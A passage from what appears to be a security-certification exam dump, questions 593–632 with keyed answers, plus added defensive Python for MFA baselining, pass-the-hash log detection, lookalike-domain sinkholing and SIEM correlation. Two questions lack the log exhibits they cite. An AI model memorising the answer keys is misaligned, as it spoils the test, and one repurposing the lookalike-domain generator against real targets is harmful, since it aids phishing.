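    """Toy stand-in for a good cipher (illustration only, not a real cipher):
    XOR with a SHA-256 counter-mode keystream, so no keystream block repeats."""
    stream = bytearray()
    counter = 0
    while len(stream) < len(plaintext):
        stream += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(p ^ k for p, k in zip(plaintext, stream))


def repeating_key_ciphertext(plaintext: bytes, key: bytes) -> bytes:
    """Toy weak cipher: one 16-byte keystream block reused for every block, so
    identical plaintext blocks produce identical ciphertext blocks."""
    ks = hashlib.sha256(key).digest()[:BLOCK]
    return bytes(p ^ ks[i % BLOCK] for i, p in enumerate(plaintext))


def repeated_blocks(data: bytes, block: int = BLOCK) -> int:
    """Number of ciphertext blocks that exactly repeat an earlier block:
    plaintext order that survived encryption."""
    blocks = [data[i:i + block] for i in range(0, len(data), block)]
    return len(blocks) - len(set(blocks))


def report() -> dict:
    """Entropy and block-repeat figures for plaintext, good and weak ciphertext."""
    good = keystream_ciphertext(PLAINTEXT, KEY)
    weak = repeating_key_ciphertext(PLAINTEXT, KEY)
    return {
        "plaintext_entropy": shannon_entropy(PLAINTEXT),
        "good_entropy": shannon_entropy(good),
        "weak_entropy": shannon_entropy(weak),
        "good_repeats": repeated_blocks(good),
        "weak_repeats": repeated_blocks(weak),
    }


if __name__ == "__main__":
    for name, value in report().items():
        print(f"{name}: {value:.3f}" if isinstance(value, float) else f"{name}: {value}")
```

The weak scheme's entropy stays close to the plaintext's, and 126 of its 128 blocks are repeats, because the same 16 key bytes are applied to the same two plaintext blocks over and over; the counter-mode output has no repeated blocks and an entropy near 8 bits per byte.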
QUESTION 593
Which of the following components can be used to consolidate and forward inbound Internet
traffic to multiple cloud environments through a single firewall?
A. Transit gateway
B. Cloud hot site
C. Edge computing
D. DNS sinkhole
Answer: A
Explanation:
VPC peering relationships can quickly become difficult to manage, especially if each VPC must
interconnect in a mesh-like structure. A transit gateway is a simpler means of managing these
interconnections. Essentially, a transit gateway is a virtual router that handles routing between the
subnets in each attached VPC and any attached VPN gateways (aws.amazon.com/transitgateway).
QUESTION 594
A recent security breach exploited software vulnerabilities in the firewall and within the network
management solution. Which of the following will MOST likely be used to identify when the
breach occurred through each device?
A. SIEM correlation dashboards
B. Firewall syslog event logs
C. Network management solution login audit logs
D. Bandwidth monitors and interface sensors
Answer: A
Explanation:
A SIEM ingests both the firewall's syslog events and the network management solution's audit
logs, normalizes their timestamps and correlates them, so it can establish when the breach
occurred on each device from a single view. Either device's own logs cover only that device.
QUESTION 595
The Chief Technology Officer of a local college would like visitors to utilize the school's WiFi but
must be able to associate potential malicious activity to a specific person.
Which of the following would BEST allow this objective to be met?
A. Requiring all new, on-site visitors to configure their devices to use WPS
B. Implementing a new SSID for every event hosted by the college that has visitors
C. Creating a unique PSK for every visitor when they arrive at the reception area
D. Deploying a captive portal to capture visitors' MAC addresses and names
Answer: D
QUESTION 596
Two organizations plan to collaborate on the evaluation of new SIEM solutions for their respective
companies. A combined effort from both organizations' SOC teams would speed up the effort.
Which of the following can be written to document this agreement?
A. MOU
B. ISA
C. SLA
D. NDA
Answer: A
Explanation:
A memorandum of understanding (MOU) is the document two organizations write to record an
agreement to cooperate and the high-level roles and responsibilities of each side, which is all a
joint SIEM evaluation needs. An interconnection security agreement (ISA) is different: it regulates
the security-relevant aspects of an intended connection between an agency and an external
system, i.e. the security interface between two systems operating under two distinct authorities,
and includes descriptive, technical, procedural and planning information. An ISA is usually
preceded by a formal MOA/MOU that defines the high-level roles and responsibilities for managing
a cross-domain connection. No systems are being interconnected here, so the MOU is the right
document.
QUESTION 597
Which of the following employee roles is responsible for protecting an organization's collected
personal information?
A. CTO
B. DPO
C. CEO
D. DBA
Answer: B
Explanation:
A data protection officer (DPO) is an enterprise security leadership role required by the General
Data Protection Regulation (GDPR). Data protection officers are responsible for overseeing a
company's data protection strategy and its implementation to ensure compliance with GDPR
requirements.
QUESTION 598
A malware attack has corrupted 30TB of company data across all file servers. A systems
administrator identifies the malware and contains the issue, but the data is unrecoverable. The
administrator is not concerned about the data loss because the company has a system in place
that will allow users to access the data that was backed up last night.
Which of the following resiliency techniques did the administrator MOST likely use to prevent
impacts to business operations after an attack?
A. Tape backups
B. Replication
C. RAID
D. Cloud storage
Answer: B
Explanation:
RAID protects against disk failure, not against malware that corrupts the data itself: corrupted
blocks are mirrored or striped exactly like good ones. Users can keep working on last night's copy
of the data only because it was replicated to a separate system before the attack.
QUESTION 599
A cybersecurity administrator needs to implement a Layer 7 security control on a network and
block potential attacks. Which of the following can block an attack at Layer 7? (Choose two.)
A. HIDS
B. NIPS
C. HSM
D. WAF
E. NAC
F. NIDS
G. Stateless firewall
Answer: BD
Explanation:
A WAF (web application firewall) protects web applications by filtering and monitoring HTTP
traffic between a web application and the Internet. It typically protects against attacks such as
cross-site request forgery (CSRF), cross-site scripting (XSS), file inclusion and SQL injection,
among others. A WAF is a layer 7 (application layer, OSI model) defense.
A network intrusion prevention system (NIPS) combines the detection capability of a NIDS with
the ability to drop or block traffic inline. Because it inspects packet payloads and application
protocols, it can operate up to layer 7 and block an attack rather than only alert on it. A NIDS
only detects; an HSM stores keys; NAC controls admission to the network; a stateless firewall
filters on layer 3/4 headers alone.
QUESTION 600
An organization is moving away from the use of client-side and server-side certificates for EAP.
The company would like for the new EAP solution to have the ability to detect rogue access
points. Which of the following would accomplish these requirements?
A. PEAP
B. EAP-FAST
C. EAP-TLS
D. EAP-TTLS
Answer: B
QUESTION 601
An amusement park is implementing a biometric system that validates customers' fingerprints to
ensure they are not sharing tickets. The park's owner values customers above all and would
prefer customers' convenience over security. For this reason, which of the following features
should the security team prioritize FIRST?
A. Low FAR
B. Low efficacy
C. Low FRR
D. Low CER
Answer: C
Explanation:
There are two main metrics that are used to determine the performance of biometrics:
1. FAR (False Acceptance Rate)
2. FRR (False Rejection Rate)
False Acceptance Rate (FAR) measures how often unauthorized persons are incorrectly accepted.
False Rejection Rate (FRR) measures how often an authorized person is incorrectly rejected.
If the emphasis is security, a low FAR matters most: a low FAR means a lower chance of
accepting someone who should not be. If the emphasis is convenience, a low FRR matters most:
a low FRR means a lower chance of rejecting someone who should be accepted. The CER
(crossover error rate) is the point where the two are equal and is used to compare overall
accuracy, not to tune for one side.
QUESTION 602
A security proposal was set up to track requests for remote access by creating a baseline of the
users' common sign-in properties. When a baseline deviation is detected, an MFA challenge will
be triggered. Which of the following should be configured in order to deploy the proposal?
A. Context-aware authentication
B. Simultaneous authentication of equals
C. Extensible authentication protocol
D. Agentless network access control
Answer: A
Explanation:
Context-Aware authentication - An access control scheme that verifies an object's identity based
on various environmental factors, like time, location, and behavior.
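The proposal in the question (baseline the users' sign-in properties, challenge with MFA on deviation) is straightforward to prototype. The Python below is an added example, not code from the exam material or any vendor product: it builds a per-user baseline of countries, devices and login hours from constructed sign-in history, then scores a new attempt, including an impossible-travel check based on great-circle distance and elapsed time. The user name, device identifiers, coordinates and the 900 km/h plausibility limit are all assumptions.

```python
import math
from dataclasses import dataclass
from datetime import datetime, timezone

# Assumption: nothing legitimate moves faster than a commercial flight between sign-ins.
MAX_PLAUSIBLE_KMH = 900.0


@dataclass(frozen=True)
class SignIn:
    user: str
    ts: datetime
    country: str
    device_id: str
    lat: float
    lon: float


def haversine_km(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance between two points, in kilometres."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = math.radians(lat2 - lat1)
    dlam = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * 6371.0 * math.asin(math.sqrt(a))


def build_baseline(history: list[SignIn]) -> dict:
    """Per-user baseline of the tracked sign-in properties: countries, devices,
    hours of day, and the most recent sign-in (for the travel check)."""
    base: dict = {}
    for s in history:
        b = base.setdefault(s.user, {"countries": set(), "devices": set(), "hours": set(), "last": None})
        b["countries"].add(s.country)
        b["devices"].add(s.device_id)
        b["hours"].add(s.ts.hour)
        if b["last"] is None or s.ts > b["last"].ts:
            b["last"] = s
    return base


def deviations(baseline: dict, attempt: SignIn) -> list[str]:
    """Baseline deviations for one sign-in attempt; an empty list means normal."""
    b = baseline.get(attempt.user)
    if b is None:
        return ["no baseline for user"]
    reasons = []
    if attempt.country not in b["countries"]:
        reasons.append("new country")
    if attempt.device_id not in b["devices"]:
        reasons.append("unknown device")
    if attempt.ts.hour not in b["hours"]:
        reasons.append("unusual hour")
    last = b["last"]
    elapsed_h = (attempt.ts - last.ts).total_seconds() / 3600
    if elapsed_h > 0:
        km = haversine_km(last.lat, last.lon, attempt.lat, attempt.lon)
        if km / elapsed_h > MAX_PLAUSIBLE_KMH:
            reasons.append("impossible travel")
    return reasons


def requires_mfa(baseline: dict, attempt: SignIn) -> bool:
    """Step-up decision from the proposal: any deviation triggers an MFA challenge."""
    return bool(deviations(baseline, attempt))


def _utc(s: str) -> datetime:
    return datetime.fromisoformat(s).replace(tzinfo=timezone.utc)


# Constructed history and attempts (not from the page): "alice", the device ids
# and the New York / Moscow coordinates are hypothetical sample data.
HISTORY = [
    SignIn("alice", _utc("2024-03-01T09:00:00"), "US", "lt-0142", 40.71, -74.01),
    SignIn("alice", _utc("2024-03-02T13:00:00"), "US", "lt-0142", 40.71, -74.01),
]
BASELINE = build_baseline(HISTORY)
NORMAL_ATTEMPT = SignIn("alice", _utc("2024-03-03T09:30:00"), "US", "lt-0142", 40.71, -74.01)
SUSPICIOUS_ATTEMPT = SignIn("alice", _utc("2024-03-02T14:00:00"), "RU", "unk-77", 55.75, 37.62)

if __name__ == "__main__":
    for a in (NORMAL_ATTEMPT, SUSPICIOUS_ATTEMPT):
        print(a.ts.isoformat(), deviations(BASELINE, a), "-> MFA" if requires_mfa(BASELINE, a) else "-> allow")
```

The second attempt is one hour after a sign-in from New York but comes from Moscow on an unknown device, so it trips every check; in a real deployment the baseline would be built from weeks of history and the deviations would be weighted rather than treated as all-or-nothing.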
QUESTION 603
A company recently experienced a significant data loss when proprietary information was leaked
to a competitor. The company took special precautions by using proper labels; however, email
filter logs do not have any record of the incident. An investigation confirmed the corporate
network was not breached, but documents were downloaded from an employee's COPE tablet
and passed to the competitor via cloud storage. Which of the following is the BEST remediation
for this data leak?
A. User training
B. CASB
C. MDM
D. DLP
Answer: D
QUESTION 604
The Chief Information Security Officer wants to prevent exfiltration of sensitive information from
employee cell phones when using public USB power charging stations. Which of the following
would be the BEST solution to implement?
A. DLP
B. USB data blocker
C. USB OTG
D. Disabling USB ports
Answer: B
Explanation:
Malicious USB charging cables and plugs are a widespread problem. As with card skimming, a
device may be placed over a public charging port at airports and other transit locations. A USB
data blocker mitigates these juice-jacking attacks by passing only the power pins and physically
disconnecting the data lines, so no data transfer is possible when the smartphone or laptop is
connected to the charge point.
QUESTION 605
An organization is planning to open other data centers to sustain operations in the event of a
natural disaster. Which of the following considerations would BEST support the organization's
resiliency?
A. Geographic dispersal
B. Generator power
C. Fire suppression
D. Facility automation
Answer: A
Explanation:
Geographic dispersal places the additional data centers far enough apart (another region or
country) that a single natural disaster such as an earthquake, hurricane or flood cannot take them
all out at once.
QUESTION 606
A security analyst has been asked by the Chief Information Security Officer to:
- develop a secure method of providing centralized management of
infrastructure
- reduce the need to constantly replace aging end user machines
- provide a consistent user desktop experience
Which of the following BEST meets these requirements?
A. BYOD
B. Mobile device management
C. VDI
D. Containerization
Answer: C
Explanation:
Virtual Desktop Infrastructure (VDI) is a technology that refers to the use of virtual machines to
provide and manage virtual desktops. VDI hosts desktop environments on a centralized server
and deploys them to end-users on request.
QUESTION 607
Historically, a company has had issues with users plugging in personally owned removable media
devices into corporate computers. As a result, the threat of malware incidents is almost constant.
Which of the following would BEST help prevent the malware from being installed on the
computers?
A. AUP
B. NGFW
C. DLP
D. EDR
Answer: D
QUESTION 608
A company wants the ability to restrict web access and monitor the websites that employees visit.
Which of the following would BEST meet these requirements?
A. Internet proxy
B. VPN
C. WAF
D. Firewall
Answer: A
QUESTION 609
A security analyst has been tasked with creating a new WiFi network for the company. The
requirements received by the analyst are as follows:
- Must be able to differentiate between users connected to WiFi
- The encryption keys need to change routinely without interrupting the
users or forcing reauthentication
- Must be able to integrate with RADIUS
- Must not have any open SSIDs
Which of the following options BEST accommodates these requirements?
A. WPA2-Enterprise
B. WPA3-PSK
C. 802.11n
D. WPS
Answer: A
Explanation:
Deploying WPA2-Enterprise requires a RADIUS server, which authenticates each user individually
(so users can be told apart). Authentication is based on 802.1X and one of several EAP methods.
Because each device authenticates before it connects, a per-session pairwise key is derived for
that device, and the access point can rotate group keys and rekey sessions without asking users
to reauthenticate. A pre-shared key (WPA3-PSK) cannot distinguish users, 802.11n is a PHY
standard rather than a security option, and WPS is an insecure pairing convenience.
QUESTION 610
An application owner reports suspicious activity on an internal financial application from various
internal users within the past 14 days. A security analyst notices the following:
- Financial transactions were occurring during irregular time frames and outside of business hours
by unauthorized users.
- Internal users in question were changing their passwords frequently during that time period.
- A jump box that several domain administrator users use to connect to remote devices was
recently compromised.
- The authentication method used in the environment is NTLM.
Which of the following types of attacks is MOST likely being used to gain unauthorized access?
A. Pass-the-hash
B. Brute-force
C. Directory traversal
D. Replay
Answer: A
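Pass-the-hash replays a stolen NT hash over the network, so on the target it appears as a network logon (LogonType 3) authenticated with NTLM instead of Kerberos. The Python below is an added detection sketch, not part of the exam material: it runs a heuristic over constructed Windows Security 4624 records (field names follow the event's EventData names; the hosts, IPs, accounts and business-hours window are hypothetical) and flags NTLM network logons by privileged accounts that originate from the compromised jump box or fall outside business hours, plus a fan-out count of how many admin accounts were replayed from one source.

```python
from collections import defaultdict
from datetime import datetime

# Constructed Windows Security event 4624 records (not from the page). Field
# names follow 4624's EventData; hosts, IPs and accounts are hypothetical.
EVENTS = [
    {"time": "2024-05-10T02:14:00", "TargetUserName": "da_ops",    "LogonType": 3, "AuthenticationPackageName": "NTLM",     "IpAddress": "10.0.5.20", "Computer": "FIN-APP01"},
    {"time": "2024-05-10T10:05:00", "TargetUserName": "jsmith",    "LogonType": 3, "AuthenticationPackageName": "Kerberos", "IpAddress": "10.0.8.14", "Computer": "FIN-APP01"},
    {"time": "2024-05-10T03:40:00", "TargetUserName": "da_backup", "LogonType": 3, "AuthenticationPackageName": "NTLM",     "IpAddress": "10.0.5.20", "Computer": "FIN-DB01"},
    {"time": "2024-05-10T14:20:00", "TargetUserName": "da_ops",    "LogonType": 2, "AuthenticationPackageName": "NTLM",     "IpAddress": "-",         "Computer": "JUMP01"},
    {"time": "2024-05-10T11:00:00", "TargetUserName": "da_ops",    "LogonType": 3, "AuthenticationPackageName": "Kerberos", "IpAddress": "10.0.5.20", "Computer": "FIN-APP01"},
]

JUMP_BOX_IPS = {"10.0.5.20"}          # the compromised jump box from the scenario (address is hypothetical)
PRIVILEGED_ACCOUNTS = {"da_ops", "da_backup"}
BUSINESS_HOURS = range(8, 18)         # assumption: 08:00-17:59 local time


def is_ntlm_network_logon(ev: dict) -> bool:
    """Pass-the-hash presents the NT hash over the network, so it surfaces as a
    LogonType 3 logon using the NTLM package rather than Kerberos."""
    return ev["LogonType"] == 3 and ev["AuthenticationPackageName"].upper() == "NTLM"


def pth_indicators(ev: dict) -> list[str]:
    """Reasons an event matches the scenario's pass-the-hash pattern (empty = none)."""
    if not (is_ntlm_network_logon(ev) and ev["TargetUserName"] in PRIVILEGED_ACCOUNTS):
        return []
    reasons = ["NTLM network logon by privileged account"]
    if ev["IpAddress"] in JUMP_BOX_IPS:
        reasons.append("source is compromised jump box")
    if datetime.fromisoformat(ev["time"]).hour not in BUSINESS_HOURS:
        reasons.append("outside business hours")
    return reasons


def find_candidates(events: list[dict]) -> list[tuple[str, str, str, list[str]]]:
    """(time, account, target host, reasons) for every event with indicators."""
    out = []
    for ev in events:
        reasons = pth_indicators(ev)
        if reasons:
            out.append((ev["time"], ev["TargetUserName"], ev["Computer"], reasons))
    return out


def privileged_fanout(events: list[dict]) -> dict[str, int]:
    """Distinct privileged accounts used over NTLM from each source IP: one host
    replaying several admins' hashes is the lateral-movement signature."""
    seen = defaultdict(set)
    for ev in events:
        if is_ntlm_network_logon(ev) and ev["TargetUserName"] in PRIVILEGED_ACCOUNTS:
            seen[ev["IpAddress"]].add(ev["TargetUserName"])
    return {ip: len(users) for ip, users in seen.items()}


if __name__ == "__main__":
    for candidate in find_candidates(EVENTS):
        print(candidate)
    print(privileged_fanout(EVENTS))
```

The interactive NTLM logon on the jump box itself (LogonType 2) and the Kerberos logons are left alone; only the two off-hours NTLM network logons of domain-admin accounts from the jump box are reported, and the fan-out shows both admin hashes being replayed from the same source.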
QUESTION 611
A systems administrator is troubleshooting a server's connection to an internal web server. The
administrator needs to determine the correct ports to use. Which of the following tools BEST
shows which ports on the web server are in a listening state?
A. ipconfig
B. ssh
C. Ping
D. Netstat
Answer: D
Explanation:
ipconfig - shows the IP configuration of the local machine
ssh - opens an encrypted remote shell on another host (scp and sftp ride on it); it does not list ports
ping - sends ICMP echo requests to check whether a node responds
netstat - lists sockets, including ports in the LISTEN state (netstat -an; ss -tln on modern Linux)
QUESTION 612
Which of the following describes the continuous delivery software development methodology?
A. Waterfall
B. Spiral
C. V-shaped
D. Agile
Answer: D
Explanation:
Agile methodology is a way to manage a project by breaking it up into several phases. It involves
constant collaboration with stakeholders and continuous improvement at every stage. Once the
work begins, teams cycle through a process of planning, executing, and evaluating.
QUESTION 613
An attacker was eavesdropping on a user who was shopping online. The attacker was able to
spoof the IP address associated with the shopping site. Later, the user received an email
regarding the credit card statement with unusual purchases.
Which of the following attacks took place?
A. On-path attack
B. Protocol poisoning
C. Domain hijacking
D. Bluejacking
Answer: A
Explanation:
An on-path attack (man-in-the-middle) occurs when an attacker places themselves between two
devices (often a web browser and a web server) and intercepts or modifies the communications
between the two.
In this question the attacker was eavesdropping on the connection, which means they placed
themselves between the user and the shopping site and intercepted the traffic; spoofing the
shopping site's IP address is how the user's traffic was routed through the attacker. The attacker
most likely captured credit card or account information from the session and used it to make the
purchases.
QUESTION 614
A company needs to validate its updated incident response plan using a real-world scenario that
will test decision points and relevant incident response actions without interrupting daily
operations. Which of the following would BEST meet the company's requirements?
A. Red-team exercise
B. Capture-the-flag exercise
C. Tabletop exercise
D. Phishing exercise
Answer: C
QUESTION 615
A company is looking to migrate some servers to the cloud to minimize its technology footprint.
The company has 100 databases that are on premises. Which of the following solutions will
require the LEAST management and support from the company?
A. SaaS
B. IaaS
C. PaaS
D. SDN
Answer: A
Explanation:
In the shared responsibility model the SaaS customer manages the least: the provider runs the
hardware, operating system, runtime and the database application itself, leaving the customer
responsible only for its data and user access.
QUESTION 616
All security analysts workstations at a company have network access to a critical server VLAN.
The information security manager wants to further enhance the controls by requiring that all
access to the secure VLAN be authorized only from a given single location.
Which of the following will the information security manager MOST likely implement?
A. A forward proxy server
B. A jump server
C. A reverse proxy server
D. A stateful firewall server
Answer: B
Explanation:
A jump server is a hardened host that is the only system permitted to reach the secure VLAN;
analysts connect to it first, so all access originates from a single, auditable location. A forward
proxy mediates outbound web traffic, a reverse proxy fronts servers for inbound clients, and a
stateful firewall filters traffic but does not by itself funnel administrative access through one host.
QUESTION 617
The technology department at a large global company is expanding its Wi-Fi network
infrastructure at the headquarters building. Which of the following should be closely coordinated
between the technology, cybersecurity, and physical security departments?
A. Authentication protocol
B. Encryption type
C. WAP placement
D. VPN configuration
Answer: C
Explanation:
WAP placement is the only option with a physical dimension: where the access points are
mounted determines how far the signal leaks outside the building (cybersecurity), whether the
devices can be reached and tampered with (physical security), and how cabling and power are
provisioned (technology).
QUESTION 618
Which of the following BEST reduces the security risks introduced when running systems that
have expired vendor support and lack an immediate replacement?
A. Implement proper network access restrictions
B. Initiate a bug bounty program
C. Classify the system as shadow IT
D. Increase the frequency of vulnerability scans
Answer: A
QUESTION 619
An organization wants to implement a biometric system with the highest likelihood that an
unauthorized user will be denied access.
Which of the following should the organization use to compare biometric solutions?
A. FRR
B. Difficulty of use
C. Cost
D. FAR
E. CER
Answer: D
Explanation:
Since the question is looking for the highest likelihood that an unauthorized user will be denied
access. The organization will side with the biometric solution that, in this case, would provide the
most security.
The False Acceptance Rate (FAR) metric determines the number of instances where
unauthorized persons were incorrectly authorized.
Making sure the False Acceptance Rate is low means a lower possibility for someone to be
authorized who shouldn't. This would provide the security the organization is looking for.
The Crossover Error Rate(CER) describes the point where the FRR and FAR are equal showing
the accuracy of a biometric system. The accuracy/sensitivity of biometric system is not what the
organization is concerned with, only the security the solution provides.
QUESTION 620
Which of the following environments minimizes end user disruption and is MOST likely to be used
to assess the impacts of any database migrations or major system changes by using the final
version of the code in an operationally representative environment?
A. Staging
B. Test
C. Production
D. Development
Answer: A
Explanation:
A staging environment mirrors production closely enough to validate the final version of the code,
including database migrations, before deployment and without affecting real users.
QUESTION 621
A database administrator wants to grant access to an application that will be reading and writing
data to a database. The database is shared by other applications also used by the finance
department.
Which of the following account types is MOST appropriate for this purpose?
A. Service
B. Shared
C. Generic
D. Admin
Answer: A
Explanation:
Service accounts are a special type of non-human privileged account used to execute
applications and run automated services, virtual machine instances, and other processes. Service
accounts can be privileged local or domain accounts, and in some cases, they may have domain
administrative privileges.
QUESTION 622
A junior security analyst is conducting an analysis after passwords were changed on multiple
accounts without users' interaction. The SIEM has multiple login entries with the following text:
Which of the following is the MOST likely attack conducted on the environment?
A. Malicious script
B. Privilege escalation
C. Domain hijacking
D. DNS poisoning
Answer: A
Explanation:
Malicious scripts are fragments of code that threat actors write or modify for nefarious purposes.
They are hidden in legitimate websites, third-party scripts and other places to compromise
client-side web applications and webpages, or run directly against accounts and systems, for
example to change passwords on many accounts without any user interaction.
QUESTION 623
A company is receiving emails with links to phishing sites that look very similar to the company's
own website address and content.
Which of the following is the BEST way for the company to mitigate this attack?
A. Create a honeynet to trap attackers who access the VPN with credentials obtained by phishing.
B. Generate a list of domains similar to the company's own and implement a DNS sinkhole for each.
C. Disable POP and IMAP on all Internet-facing email servers and implement SMTPS.
D. Use an automated tool to flood the phishing websites with fake usernames and passwords.
Answer: B
Explanation:
A DNS sinkhole answers queries for a listed domain with a harmless address instead of the real
one. Generating the list of lookalike (typosquatted) domains and sinkholing each of them means
that users who click a phishing link, or mistype the company's own address, are never connected
to the attacker's site.
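Generating the lookalike list and turning it into sinkhole configuration is mechanical. The Python below is an added example, not from the exam material or any sinkhole product: it derives omission, transposition, repetition and homoglyph variants of a label and emits dnsmasq `address=` lines that resolve each variant (and its subdomains) to 0.0.0.0. The homoglyph table is a small illustrative subset, and `example.com` is a placeholder for the company's real domain.

```python
# Single-character swaps that read alike in many fonts (assumption: a small
# illustrative table, not an exhaustive homoglyph list).
HOMOGLYPHS = {"o": "0", "l": "1", "i": "1", "e": "3", "a": "4", "s": "5", "m": "rn", "w": "vv"}


def lookalikes(domain: str) -> set[str]:
    """Typosquat candidates for a registered name: omission, transposition,
    repetition and homoglyph substitution applied to the label."""
    label, _, tld = domain.lower().rpartition(".")
    variants = set()
    for i in range(len(label)):
        variants.add(label[:i] + label[i + 1:])                              # omission
        variants.add(label[:i] + label[i] + label[i:])                       # repetition
        if label[i] in HOMOGLYPHS:
            variants.add(label[:i] + HOMOGLYPHS[label[i]] + label[i + 1:])   # homoglyph
    for i in range(len(label) - 1):
        variants.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])    # transposition
    variants.discard(label)  # swapping identical neighbours yields the real name
    return {f"{v}.{tld}" for v in variants if v}


def sinkhole_config(domains: set[str], sink_ip: str = "0.0.0.0") -> str:
    """dnsmasq 'address=/name/ip' lines: each answers the name and all of its
    subdomains with the sinkhole address. Sorted so the file diffs cleanly."""
    return "\n".join(f"address=/{d}/{sink_ip}" for d in sorted(domains)) + "\n"


if __name__ == "__main__":
    print(sinkhole_config(lookalikes("example.com")))
```

Before deploying, run the generated list against the registry (or passive DNS) and keep an allow-list: some variants may be legitimate names owned by the company or by unrelated businesses.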
QUESTION 624
As part of a security compliance assessment, an auditor performs automated vulnerability scans.
In addition, which of the following should the auditor do to complete the assessment?
A. User behavior analysis
B. Packet captures
C. Configuration reviews
D. Log analysis
Answer: C
Explanation:
An automated vulnerability scanner reports the weaknesses it can detect from the network or
from an agent, but it cannot judge whether systems are configured according to policy. A
configuration review (comparing device and system settings against baselines and the relevant
standard) is the assessment step that complements the scans. Log analysis, packet captures and
user behavior analysis are monitoring and investigative activities rather than compliance
assessment.
QUESTION 625
After multiple on premises security solutions were migrated to the cloud, the incident response
time increased. Analysts are spending a long time tracing information across different cloud
consoles and correlating data in different formats.
Which of the following can be used to optimize the incident response time?
A. CASB
B. VPC
C. SWG
D. CMS
Answer: A
Explanation:
A cloud access security broker sits between the users and the cloud services and gives the
team one place to control, monitor and log activity across the different providers, so analysts no
longer have to trace events through several consoles and data formats.
QUESTION 626
Which of the following is the MOST relevant security check to be performed before embedding
third-party libraries in developed code?
A. Check to see if the third party has resources to create dedicated development and staging
environments.
B. Verify the number of companies that downloaded the third-party code and the number of
contributions on the code repository.
C. Assess existing vulnerabilities affecting the third-party code and the remediation efficiency of the
libraries' developers.
D. Read multiple penetration-testing reports for environments running software that reused the
library.
Answer: C
Explanation:
What to be done to best prevent issues in third-party code?
Establish a baseline and process for every third-party software that is introduced into the
organisation, including performing a risk assessment to establish the risk associated with
implementing a certain piece of code.
QUESTION 627
Certain users are reporting their accounts are being used to send unauthorized emails and
conduct suspicious activities. After further investigation, a security analyst notices the following:
- All users share workstations throughout the day.
- Endpoint protection was disabled on several workstations throughout
the network.
- Travel times on logins from the affected users are impossible.
- Sensitive data is being uploaded to external sites.
- All user account passwords were forced to be reset and the issue
continued.
Which of the following attacks is being used to compromise the user accounts?
A. Brute-force
B. Keylogger
C. Dictionary
D. Rainbow
Answer: B
Explanation:
A keylogger explains why the issue persisted even after every password was reset: the new
passwords are captured as soon as they are typed on the shared workstations whose endpoint
protection was disabled. Nothing in the evidence points at password guessing, which is what
brute-force, dictionary and rainbow-table attacks are.
QUESTION 628
Which of the following is the MOST likely reason for securing an air-gapped laboratory HVAC
system?
A. To avoid data leakage
B. To protect surveillance logs
C. To ensure availability
D. To restrict remote access
Answer: C
Explanation:
An HVAC system is a critical component of a data center or laboratory. If it fails, the systems
overheat and crash, which is a loss of availability and in the worst case also data loss. The air
gap already addresses remote access and data leakage, so availability is the remaining concern.
QUESTION 629
An application developer accidentally uploaded a company's code-signing certificate private key
to a public web server. The company is concerned about malicious use of its certificate.
Which of the following should the company do FIRST?
A. Delete the private key from the repository.
B. Verify the public key is not exposed as well.
C. Update the DLP solution to check for private keys.
D. Revoke the code-signing certificate.
Answer: D
Explanation:
Revoking the code-signing certificate comes first because it is the only action that stops code
signed with the leaked key from being trusted. Deleting the key from the server does not undo the
exposure: bots continuously crawl public repositories and servers for exactly this kind of human
error, so the key must be assumed copied already.
QUESTION 630
A security analyst is investigating some users who are being redirected to a fake website that
resembles www.comptia.org. The following output was found on the naming server of the
organization:
Which of the following attacks has taken place?
A. Domain reputation
B. Domain hijacking
C. Disassociation
D. DNS poisoning
Answer: D
Explanation:
DNS server cache poisoning corrupts the records held by the DNS server itself. One method is to
perform a DoS against the authoritative server for the domain and then spoof replies to requests
from other name servers. Another is to get the victim name server to answer a recursive query
from the attacking host: a recursive query compels the DNS server to query the authoritative
server on behalf of the client, and the attacker races a forged response. Either way the poisoned
record sends users to the fake site.
QUESTION 631
The Chief Information Security Officer (CISO) requested a report on potential areas of
improvement following a security incident.
Which of the following incident response processes is the CISO requesting?
A. Lessons learned
B. Preparation
C. Detection
D. Containment
E. Root cause analysis
Answer: A
Explanation:
Lessons learned is the final step in incident response, where the organization reviews its
response and prepares for a future attack. This is where you understand how and why the
incident occurred, identify weaknesses in the organization's practices, note what went well, and
record what should be done to prepare for the next incident; it is the step that produces the
report on areas of improvement the CISO asked for.
Incident response - a set of procedures the IT staff follows to detect, respond to and recover
from a security incident.
Phases in the incident response plan:
1. Preparation: the organization plans how it will respond to an attack (policies, tooling, training).
2. Identification: detecting and determining whether an incident has occurred.
3. Containment: once a threat has been identified, limiting or preventing any further damage.
4. Eradication: removal of the threat.
5. Recovery: restoring the systems affected by the incident.
6. Lessons learned: reviewing the response and preparing for a future attack.
QUESTION 632
While reviewing an alert that shows a malicious request on one web application, a cybersecurity
analyst is alerted to a subsequent token reuse moments later on a different service using the
same single sign-on method.
Which of the following would BEST detect a malicious actor?
A. Utilizing SIEM correlation engines
B. Deploying Netflow at the network border
C. Disabling session tokens for all sites
D. Deploying a WAF for the web server
Answer: A
Explanation:
The initial compromise was a malicious request on a web server; moments later the token
created by SSO was used on another service (the question does not say which). A WAF on the
web server would detect the attacker only on that server. Correlating the WAF alert with the
reuse of the same SSO token on other services within a short window, which is what a SIEM
correlation engine does, is what detects the malicious actor across both.
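The correlation rule described above can be expressed in a few lines. The Python below is an added example, not from the exam material or any SIEM product: it joins a WAF alert to authentication logs from other services on the SSO token identifier, reports reuse of that token on a different service within a configurable window, and notes whether the token's source IP changed from the legitimate session's. The services, IPs, users, token ids and the 10-minute window are constructed sample data.

```python
from datetime import datetime, timedelta

# Constructed records (not from the page): one WAF alert plus authentication
# logs from services behind the same SSO. IPs, users and token ids are hypothetical.
WAF_ALERTS = [
    {"ts": "2024-06-01T12:00:00", "service": "portal", "token_id": "tok-9f2", "src_ip": "203.0.113.7", "rule": "sqli-union-select"},
]
AUTH_LOGS = [
    {"ts": "2024-06-01T11:58:00", "service": "portal",  "token_id": "tok-9f2", "src_ip": "198.51.100.4", "user": "bob"},
    {"ts": "2024-06-01T12:01:30", "service": "payroll", "token_id": "tok-9f2", "src_ip": "203.0.113.7", "user": "bob"},
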